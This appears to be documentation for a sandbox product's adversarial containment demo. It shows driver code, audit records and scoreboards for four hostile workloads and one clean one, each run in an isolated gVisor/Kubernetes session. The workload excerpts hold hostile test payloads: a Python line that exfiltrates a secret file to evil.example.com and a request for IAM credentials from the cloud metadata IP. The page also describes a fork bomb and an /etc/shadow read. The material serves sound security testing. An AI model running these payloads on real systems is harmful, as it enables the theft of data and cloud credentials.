Demo: adversarial containment

Five hostile workloads. Five sandboxes. Zero escapes.

Enclave runs five workloads against one control plane — four hostile, one clean — each in its own ephemeral, isolated session. The hostile four are contained; the clean one returns a structured result. Every egress decision, quota kill, and exit is recorded.

Overview

Source: this page summarizes the demo driver at demo/src/scenarios/adversarial.ts. The scenario list, workloads, expected verdicts, and run command below are taken from it verbatim.

Enclave treats every agent-generated workload as untrusted. It does not inspect the code, classify it, or decide whether it looks hostile — it simply gives each workload its own ephemeral, isolated sandbox and lets containment, not judgement, do the work. A workload that misbehaves is contained by the same boundary that lets a well-behaved one run.

This demo makes that concrete with five workloads. Four are written to attack — exfiltrate data, lift cloud credentials off the metadata IP, exhaust resources, and read the host filesystem. The fifth is a clean compute that simply returns a result. The point is not that Enclave guesses which is which; it is that all five run under identical containment, and the boundary is what makes the difference.

Critically, these are five separate sandboxes — not one shared environment running five scripts. Each run() mints its own session with its own default-deny egress policy and its own quotas; none can see, reach, or touch another. Teardown reclaims each one independently.

captured · ENCLAVE_BASE_URL=…:8090 pnpm demo:adversarial · exit 0 · 6/6 · gVisor/Kubernetes

▣ Enclave — Five hostile workloads. Five sandboxes. Zero escapes.
control plane: http://127.0.0.1:8090  ·  backend: kubernetes  ·  mode: kernel containment

Each workload runs in its OWN sandbox — five separate sessions, never shared.

  WORKLOAD                                 VERDICT
  ──────────────────────────────────────── ──────────────────────────────────
✓ data-exfil egress  -> evil.example.com   CONTAINED  egress_denied -> host
✓ metadata-IP cred read -> 169.254.169.254 CONTAINED  egress_denied -> 169.254.169.254
✓ resource exhaustion (fork bomb)          CONTAINED  fork bomb CONTAINED
✓ host-filesystem read  -> /etc/shadow     CONTAINED  host path not mounted
✓ clean compute (well-behaved agent)       SUCCEEDED  succeeded {"answer":285}
  ──────────────────────────────────────── ──────────────────────────────────
✓ brokered secret                          WITHHELD  no brokered secret on any public Session · no eyJ token

Live run on the gVisor/Kubernetes backend: five workloads in five separate gVisor-runtimeclass pods. The four hostile ones are contained, the clean one returns its result, and no brokered secret appears on any public session. Source: evidence/captures-real/adversarial.log

The recording on this page runs against the gVisor-on-Kubernetes backend: a userspace-kernel security boundary, with one gVisor (runsc) sandbox per session. The same adversarial logic also runs on the in-process simulator for laptop smoke tests (it models the observable behaviour without executing code) and on the Docker backend (a dev convenience on the host kernel, not a security boundary). Where a detail differs by backend, this page says which.

The five scenarios

Each row is one session in one sandbox. Four carry an attack; the fifth behaves. The egress policy for all five is deny_all — nothing leaves unless an explicit allowlist permits it.
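
As a rough illustration of what deny_all means for a single connection attempt, the decision can be sketched as a pure function. This is not Enclave's implementation: the `EgressPolicy` shape mirrors the `egress` field in the demo requests, while `decideEgress`, `EgressDecision`, and the `egress_allowed` label are hypothetical names used only for this sketch.

```typescript
// Mirrors the `egress` field seen in the demo requests ({ mode: "deny_all", allow: [] }).
type EgressPolicy = { mode: "deny_all"; allow: string[] };

// Hypothetical decision record; only "egress_denied" appears in the demo's audit log.
type EgressDecision =
  | { type: "egress_allowed"; host: string }
  | { type: "egress_denied"; host: string };

// Default-deny: a host is reachable only when it is explicitly allowlisted.
function decideEgress(policy: EgressPolicy, host: string): EgressDecision {
  return policy.allow.includes(host)
    ? { type: "egress_allowed", host }
    : { type: "egress_denied", host };
}

const denyAll: EgressPolicy = { mode: "deny_all", allow: [] };
console.log(decideEgress(denyAll, "169.254.169.254").type); // "egress_denied"
```

With an empty allowlist every host falls through to the denied branch, which is why all four hostile workloads and the clean one start from the same position.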

contained

Data exfiltration

Code opens a socket to an unlisted external host. Default-deny egress refuses it; the attempt is recorded as egress_denied with the host.

contained

Host-credential / metadata-IP read

Code reaches for the 169.254.169.254 cloud metadata IP to lift instance credentials. The NetworkPolicy blocks it — and there is no service-account token to steal in the first place.

contained

Resource exhaustion (fork bomb)

An unbounded os.fork() loop. On gVisor the sandbox is CONTAINED — it cannot starve the node. The labeled pids_exceeded reason is a Docker/simulator quota detail; see the note below.

contained

Host-filesystem read

Code tries to read /etc/shadow off the host. The rootfs is read-only with no host mounts, so the path simply is not there — stderr reports host path not mounted.

returns

Clean compute

A well-behaved workload computes and calls enclave.result(...). It succeeds and returns its structured JSON — the injected credential is still withheld from the caller.

The workloads, verbatim

These are the exact run() requests the demo driver submits — each carries the code string an agent might emit, plus its deny_all egress policy and credential scopes. Enclave runs them as given.

demo/src/scenarios/adversarial.ts:L84–L188 · typescript

    request: {
      code: `import requests\nrequests.get("http://evil.example.com/exfil?data=" + open("/work/secret").read())`,
      language: "python",
      egress: { mode: "deny_all", allow: [] },
    },
    expect: (s, a, modelled) =>
// … 16 lines omitted …
      code: `import urllib.request\nurllib.request.urlopen("http://169.254.169.254/latest/meta-data/iam/security-credentials/")`,
      language: "python",
      egress: { mode: "deny_all", allow: [] },
    },
    expect: (s, a, modelled) =>
      modelled
// … 16 lines omitted …
      language: "python",
      egress: { mode: "deny_all", allow: [] },
      limits: { pidsLimit: 64 },
    },
    expect: (s, _a, modelled) => {
      if (modelled) {
        const ok = s.phase === "killed" && s.killReason === "pids_exceeded";
// … 20 lines omitted …
      egress: { mode: "deny_all", allow: [] },
    },
    expect: (s, _a, modelled) => {
      if (modelled) {
        const ok = Boolean(s.result?.stderr.includes("host path not mounted"));
        return { ok, reason: ok ? "host path not mounted" : "host fs was NOT isolated" };
// … 22 lines omitted …
    },
    expect: (s) => {
      const ok = s.phase === "succeeded" && JSON.stringify(s.result?.json) === JSON.stringify({ answer: 285 });
      return { ok, reason: ok ? `succeeded ${JSON.stringify(s.result?.json)}` : `expected answer 285, got ${s.phase}/${JSON.stringify(s.result?.json)}` };
    },
  },

On the fork bomb's reason label

Be precise here: on the gVisor/Kubernetes path the fork bomb is contained. The sandbox is bounded by CPU, memory, pid, and wall-clock limits and cannot starve the node, and in the captured report the session ends in a terminal failed phase with a null killReason. The specific pids_exceeded reason label is a Docker/simulator detail (the simulator models the kill reason; the Docker path maps it from the container's cgroup limits), and the driver's modelled expectation checks for phase killed with killReason pids_exceeded. The guarantee, containment, is identical across backends; only the phase and the named reason are backend-specific.
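
One way to picture the backend split is a single expectation that branches on whether the run is modelled. The sketch below is an assumption-laden illustration, not the driver's code: the modelled branch follows the condition visible in the excerpt above, but the real-backend branch is elided in that excerpt, so the rule used here (any terminal non-success phase counts as contained) is a guess. `SessionView`, `Verdict`, `forkBombVerdict`, and the failure reason strings are hypothetical.

```typescript
// Hypothetical minimal view of a session; the real Session type is not shown on this page.
interface SessionView {
  phase: string;
  killReason: string | null;
}

interface Verdict {
  ok: boolean;
  reason: string;
}

function forkBombVerdict(s: SessionView, modelled: boolean): Verdict {
  if (modelled) {
    // Simulator path: the kill reason is modelled, so it can be asserted by name.
    const ok = s.phase === "killed" && s.killReason === "pids_exceeded";
    return { ok, reason: ok ? "pids_exceeded" : "fork bomb was NOT killed" };
  }
  // Assumption: on a real backend, containment means the session ended in a
  // terminal non-success phase, whatever the backend calls the reason.
  const ok = s.phase === "failed" || s.phase === "killed";
  return { ok, reason: ok ? "fork bomb CONTAINED" : "fork bomb was NOT contained" };
}
```

Applied to the captured gVisor row (phase failed, killReason null) with modelled set to false, this returns a passing verdict with the reason fork bomb CONTAINED, matching the report.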

What containment looks like

Containment here is audit-driven: it is not a claim, it is a record. For every session the control plane writes an immutable, per-session audit log, and the demo asserts against it. Each escape attempt leaves a specific, inspectable trace:

Egress decisions: egress is default-deny, and containment shows up two ways. The metadata-IP attempt is caught at the egress boundary and recorded as an egress_denied event carrying 169.254.169.254 (see the audit slice below). The direct exfil to evil.example.com is dropped by the per-session NetworkPolicy itself: the connection simply fails, so the session reaches a terminal failed phase with no route ever established (no packet leaves to log).
Resource limits: the fork bomb is contained by the pod's pids/cgroup limits, and the session reaches a terminal failed phase (fork bomb CONTAINED) rather than exhausting the node.
Exit / result: the host-fs read returns with host path not mounted on stderr; the clean run reaches succeeded and its structured JSON is delivered.
Secret withholding: the demo regex-scans every response for a JWT (eyJ…). No brokered secret is ever returned by the API or stored on the public session. Service-binding secrets stay at the egress proxy and the git-clone token stays on the init-container, so none can appear here.
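
The secret-withholding check can be sketched as a regex scan over the serialized public surface. The driver's actual JWT_RE is not shown on this page, so the pattern below is an assumption: three dot-separated base64url segments, the first starting with eyJ. `JWT_LIKE` and `containsJwt` are hypothetical names.

```typescript
// Assumed pattern: header.payload.signature in base64url, header starting with "eyJ".
// No `g` flag, so repeated .test() calls carry no state between them.
const JWT_LIKE = /eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/;

// Serializes whatever was collected (sessions, audit trails, results) and scans it once.
function containsJwt(publicSurface: unknown): boolean {
  const serialized = JSON.stringify(publicSurface) ?? "";
  return JWT_LIKE.test(serialized);
}

console.log(containsJwt({ reason: "egress_denied -> host" })); // false
```

Scanning the serialized form rather than individual fields means a token nested anywhere in a row is still caught, at the cost of possible false positives on any string that merely looks like a JWT.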

evidence/captures-real/adversarial-report.json:L32–L70 · json

    {
      "scenario": "metadata-IP cred read -> 169.254.169.254",
      "hostile": true,
      "sessionId": "s-0f9972-2",
      "phase": "failed",
      "killReason": null,
      "deniedEgress": [
        "169.254.169.254"
      ],
      "resultJson": null,
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "egress_denied",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ],
      "reason": "egress_denied -> 169.254.169.254",
      "passed": true
    },
    {
      "scenario": "resource exhaustion (fork bomb)",
      "hostile": true,
      "sessionId": "s-57c9eb-3",
      "phase": "failed",
      "killReason": null,
      "deniedEgress": [],
      "resultJson": null,
      "auditTypes": [
        "session_created",
        "sandbox_started",
        "result_collected",
        "workload_exited",
        "usage_metered"
      ],
      "reason": "fork bomb CONTAINED",
      "passed": true
    },

captured · evidence/adversarial-report.md · 5 sessions · 6/6 · kubernetes

| Workload | Type | Session | Verdict | Reason |
|---|---|---|---|---|
| data-exfil egress  -> evil.example.com | hostile | `s-b7d0c8-1` | CONTAINED | egress_denied -> host |
| metadata-IP cred read -> 169.254.169.254 | hostile | `s-0f9972-2` | CONTAINED | egress_denied -> 169.254.169.254 |
| resource exhaustion (fork bomb) | hostile | `s-57c9eb-3` | CONTAINED | fork bomb CONTAINED |
| host-filesystem read  -> /etc/shadow | hostile | `s-b34f9c-4` | CONTAINED | host path not mounted |
| clean compute (well-behaved agent) | clean | `s-f6d8ad-5` | succeeded | succeeded {"answer":285} |
| brokered secret | invariant | — | WITHHELD | no brokered secret + no `eyJ` token in any public field |

The persisted evidence bundle (gVisor/Kubernetes): each hostile workload's own session id and the verdict that contains it. Direct-exfil and metadata reach a failed phase (egress dropped), the fork bomb is contained, and the host-path read finds nothing mounted. Source: evidence/captures-real/adversarial-report.md

The driver expresses each expectation as an assertion over the session and its audit log, then tears the session down. A single pass covers all five scenarios plus the secret invariant: if any hostile workload escapes, or any token leaks, the run exits non-zero, so the demo doubles as a containment regression gate.

demo/src/scenarios/adversarial.ts:L256–L291 · typescript


    const verdict = sc.expect(session, audit, modelled);
    if (!verdict.ok) failures++;

    // Render the row.
    const tickOrCross = verdict.ok ? `${C.green}✓${C.reset}` : `${C.red}✗${C.reset}`;
    const badge = sc.hostile
      ? verdict.ok
        ? `${C.red}${C.bold}CONTAINED${C.reset}`
        : `${C.red}${C.bold}ESCAPED${C.reset}`
      : verdict.ok
        ? `${C.green}${C.bold}SUCCEEDED${C.reset}`
        : `${C.red}${C.bold}FAILED${C.reset}`;
    console.log(`${tickOrCross} ${pad(sc.label)} ${badge}  ${C.dim}${verdict.reason}${C.reset}`);

    rows.push({
      scenario: sc.label,
      hostile: sc.hostile,
      sessionId: session.id,
      phase: session.phase,
      killReason: session.killReason ?? null,
      deniedEgress: deniedHosts(audit),
      resultJson: session.result?.json ?? null,
      auditTypes: auditTypes(audit),
      reason: verdict.reason,
      passed: verdict.ok,
    });
    await enclave.teardown(handle.id);
  }

  // ── Final row: the secret boundary (invariant 1) ─────────────────────────────
  // Scan every public surface we collected — sessions, audit trails, results —
  // for a JWT. There must be none: no brokered secret (git-clone credential /
  // service-binding secret) is ever serialized onto the public Session/wire.
  const leaked = JWT_RE.test(JSON.stringify(rows));
  const tokenOk = !leaked;
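
The gate logic implied by this excerpt can be sketched in isolation: one check per scenario row plus one for the secret invariant, with a non-zero exit code if any check fails. The `Row` fields and `tokenOk` come from the excerpt; `GateResult`, `evaluateGate`, and the summary wording are hypothetical, and the way the real driver sets its exit code is not shown here.

```typescript
// Only the row fields this sketch needs; the driver's rows carry more.
interface Row {
  scenario: string;
  hostile: boolean;
  passed: boolean;
}

interface GateResult {
  summary: string;
  exitCode: 0 | 1;
}

function evaluateGate(rows: Row[], tokenOk: boolean): GateResult {
  const hostile = rows.filter((r) => r.hostile);
  const contained = hostile.filter((r) => r.passed).length;
  // One check per scenario row, plus one for the secret invariant.
  const total = rows.length + 1;
  const passed = rows.filter((r) => r.passed).length + (tokenOk ? 1 : 0);
  return {
    summary: `${contained}/${hostile.length} hostile contained, ${passed}/${total} checks`,
    exitCode: passed === total ? 0 : 1,
  };
}
```

With four passing hostile rows, one passing clean row, and a clean token scan, this yields 6/6 checks and exit code 0, the same tally the captured run reports. A caller in Node could assign the result to `process.exitCode`.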

Run it

The driver lives at demo/src/scenarios/adversarial.ts. One command runs all five scenarios, prints the scoreboard, and writes a JSON + Markdown evidence bundle to evidence/:

demo/package.json:L11 · json

    "demo:adversarial": "tsx src/scenarios/adversarial.ts",

It targets the control plane at ENCLAVE_BASE_URL (honoring ENCLAVE_API_KEY / ENCLAVE_TOKEN). The exit code is non-zero if any expectation fails.
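
For orientation, reading those three variables into a client configuration might look like the sketch below. Only the variable names come from this page. The header names, the precedence of ENCLAVE_TOKEN over ENCLAVE_API_KEY, and the `ClientConfig` and `configFromEnv` names are all assumptions made for illustration; the real client may differ on every one of them.

```typescript
interface ClientConfig {
  baseUrl: string;
  headers: Record<string, string>;
}

// Takes the environment as a plain record so it can be tested without touching process.env.
function configFromEnv(env: Record<string, string | undefined>): ClientConfig {
  const baseUrl = env.ENCLAVE_BASE_URL;
  if (!baseUrl) throw new Error("ENCLAVE_BASE_URL is required");

  const headers: Record<string, string> = {};
  // Assumption: header names and token-over-key precedence are illustrative only.
  if (env.ENCLAVE_TOKEN) {
    headers["authorization"] = `Bearer ${env.ENCLAVE_TOKEN}`;
  } else if (env.ENCLAVE_API_KEY) {
    headers["x-api-key"] = env.ENCLAVE_API_KEY;
  }

  // Drop trailing slashes so later path joins do not produce "//".
  return { baseUrl: baseUrl.replace(/\/+$/, ""), headers };
}
```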

captured · ENCLAVE_BASE_URL=…:8090 pnpm --filter @enclave/demo demo:adversarial · exit 0 · 6/6 · gVisor/Kubernetes

▣ Enclave — Five hostile workloads. Five sandboxes. Zero escapes.
control plane: http://127.0.0.1:8090  ·  backend: kubernetes  ·  mode: kernel containment

Each workload runs in its OWN sandbox — five separate sessions, never shared.

  WORKLOAD                                 VERDICT
  ──────────────────────────────────────── ──────────────────────────────────
✓ data-exfil egress  -> evil.example.com   CONTAINED  egress_denied -> host
✓ metadata-IP cred read -> 169.254.169.254 CONTAINED  egress_denied -> 169.254.169.254
✓ resource exhaustion (fork bomb)          CONTAINED  fork bomb CONTAINED
✓ host-filesystem read  -> /etc/shadow     CONTAINED  host path not mounted
✓ clean compute (well-behaved agent)       SUCCEEDED  succeeded {"answer":285}
  ──────────────────────────────────────── ──────────────────────────────────
✓ brokered secret                          WITHHELD  no brokered secret on any public Session · no eyJ token

The driver's scoreboard from the gVisor/Kubernetes run: five separate sessions, four hostile workloads contained, the clean one returns {answer:285}, and no brokered secret on any public session. Source: evidence/captures-real/adversarial.log

captured · ENCLAVE_BASE_URL=…:8090 pnpm demo:adversarial · 6/6 PASS · gVisor/Kubernetes

✓ 4/4 hostile workloads contained · clean run returned its result · no secret leaked — 6/6 checks.

evidence written to evidence/adversarial-report.{json,md}

The regression-gate proof line: four of four hostile workloads contained, the clean run returned, the token withheld. Six of six checks, exit 0. Source: evidence/captures-real/adversarial.log
